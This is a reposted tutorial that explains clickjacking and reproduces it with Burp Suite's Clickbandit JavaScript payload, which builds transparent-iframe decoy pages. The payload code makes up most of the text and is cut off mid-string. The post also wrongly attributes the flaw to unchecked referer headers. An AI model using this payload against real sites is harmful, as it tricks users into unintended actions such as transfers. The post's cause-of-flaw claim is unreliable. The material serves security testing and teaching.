Principle and reproduction of clickjacking vulnerability

Mobile 2023-08-11 22:51:59 views: null

1. Vulnerability principle

Click hijacking (Clickbandit) mainly uses the transparent attribute of the iframe note in HTML to attack. The principle is to cover the original web page with a transparent frame and make the victim click without knowing it. The vulnerability is mainly due to the fact that the source of the referer field is not checked. Often cooperate with csrf and xss.

In the figure, the attacker overlays a transparent frame on the original website. When the victim visits website A normally, he will click on this transparent frame B. Attackers often use this vulnerability to induce victims to click on key positions to perform some operations, such as transfer, purchase and other dangerous operations.

2. Vulnerability recurrence

1. With the burpsuite tool, select Clickbandit and copy the payload.

 Below is the payload

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
	var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
	function addClickTrap(element, minusY) {
		var clickTrap = doc.createElement('div'), cords = findPos(element);
		clickTrap.style.backgroundColor = 'none';
		clickTrap.style.border = 'none';
		clickTrap.style.position = 'absolute';
		clickTrap.style.left = cords[0] + 'px';
		clickTrap.style.top = cords[1] + 'px';
		clickTrap.style.width = element.offsetWidth + 'px';
		clickTrap.style.height = element.offsetHeight + 'px';
		if(element.zIndex || element.zIndex === '0') {
			clickTrap.style.zIndex = +element.zIndex+1;
		}
		clickTrap.style.opacity = '0.5';
		clickTrap.style.cursor = 'pointer';
		clickTrap.clickTrap = 1;
		clickTrap.addEventListener('click', function(e) {
			generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
			e.preventDefault();
			e.stopPropagation();
			return false;
		}, true);
		doc.body.appendChild(clickTrap);
	}
	function addMessage(msg) {
		var message = document.createElement('div');
			message.style.width = '100%';
			message.style.height = '20px';
			message.style.backgroundColor = '#fff5bf';
    	message.style.border = '1px solid #ff9900';
    	message.style.padding = '5px';
    	message.style.position = 'fixed';
    	message.style.bottom = '0';
    	message.style.left = '0';
    	message.style.zIndex = 100000;
    	message.style.textAlign = 'center';
    	message.style.fontFamily = 'Arial';
    	message.style.color = '#000';
    	message.appendChild(document.createTextNode(msg));
    	document.body.appendChild(message);
    	setTimeout(function() {
    		document.body.removeChild(message);
    	}, 4000);
	}
	function htmlEscape(str) {
		str = str + '';
		return str.replace(/[^\w :\-\/.?=]/gi, function(c){
			return '&#' + (+c.charCodeAt(0))+';';
		});
	}
	function getDocHeight(D) {
	    return Math.max(
	        D.body.scrollHeight, D.documentElement.scrollHeight,
	        D.body.offsetHeight, D.documentElement.offsetHeight,
	        D.body.clientHeight, D.documentElement.clientHeight
	    );
	}
	function getDocWidth(D) {
		return Math.max(
			D.body.scrollWidth, D.documentElement.scrollWidth,
			D.body.offsetWidth, D.documentElement.offsetWidth,
			D.body.clientWidth, D.documentElement.clientWidth
		);
	}
	function findPos(obj) {
	    var left = 0, top = 0;
	    if(obj.offsetParent) {
	        while(1) {
	          left += obj.offsetLeft;
	          top += obj.offsetTop;
	          if(!obj.offsetParent) {
	            break;
	          }
	          obj = obj.offsetParent;
	        }
	    } else if(obj.x && obj.y) {
	        left += obj.x;
	        top += obj.y;
	    }
	    return [left,top];
  	}
	function generatePoc(config) {
		var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
			element = config.element, x = config.x, y = config.y, pixelMode = false;
		if(config.clickTracking) {
			elementWidth = config.clickTracking[0].width;
			elementHeight = config.clickTracking[0].height;
			x = config.clickTracking[0].left;
			y = config.clickTracking[0].top;
			zoomIncrement = 1;
			config.currentPosition = 0;
		} else {
			config.clickTracking = [];
			if(element) {
				elementWidth = element.offsetWidth;
				elementHeight = element.offsetHeight;
				cords = findPos(element);
				x = cords[0];
				y = cords[1];
				zoomIncrement = 1;
			} else {
				zoomIncrement = 5;
				pixelMode = true;
			}
		}
		parentOffsetWidth = desiredX - x;
		parentOffsetHeight = desiredY - y;
		child = btoa('<script>window.addEventListener("message", function(e){ var data, childFrame = document.getElementById("childFrame"); try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit){ return false; } childFrame.style.width = data.docWidth+"px";childFrame.style.height = data.docHeight+"px";childFrame.style.left = data.left+"px";childFrame.style.top = data.top+"px";}, false);<\/script><iframe src="'+htmlEscape(self.location)+'" scrolling="no" style="width:'+(+maxWidth)+'px;height:'+(+maxHeight)+'px;position:absolute;left:'+parentOffsetWidth+'px;top:'+parentOffsetHeight+'px;border:0;" frameborder="0" '+(window.clickbandit.sandbox?'sandbox="allow-same-origin	'+htmlEscape(document.getElementById('sandboxIframeInput').value)+'" ':'')+'id="childFrame" onload="parent.postMessage(JSON.stringify({clickbandit:1}),\'*\')"><\/iframe>');
		html += '<body>\n';
		html += '<div id="container" style="clip-path:none;clip:auto;overflow:visible;position:absolute;left:0;top:0;width:100%;height:100%">\n';
		html += '<!-- Clickjacking PoC Generated by Burp Suite Professional -->\n';
		html += '<input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;">\n';
		html += '<div id="clickjack_button" style="opacity:0;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;text-align:center;font-family:Arial;font-size:100%;width:'+elementWidth+'px;height:'+elementHeight+'px;z-index:0;background-color:red;color:#fff;position:absolute;left:'+(+desiredX)+'px;top:'+(+desiredY)+'px"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click<\/div><\/div>\n';
		html += '<!-- Show this element when clickjacking is complete -->\n';
		html += '<div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You\'ve been c

Guess you like

Origin blog.csdn.net/weixin_54438700/article/details/124878119
Recommended
The sixth meeting of openKylin Community Ecology Committee was successfully held
Alibaba Cloud officially releases Tongyi Qianwen 2.5
Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter
Stack Overflow used my code to train large AI models and banned my account.
Pop!_OS’s COSMIC desktop completes App Store listing
Report: Django is still the first choice for 74% of developers
"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report
15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?
Ranking
Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures
Der M-Chip-Mac implementiert mehrere Android-Emulatoren
CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.
Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery
python3 pip ipython installation
A lot of python crawler source code sharing -- talk about the little thing about python crawler
Agile Sprint in Alpha Stage (7)
Access URL in Unity
FunctoinDemo form
MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq
Daily
More
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)

Code World

© 2018 codetd.com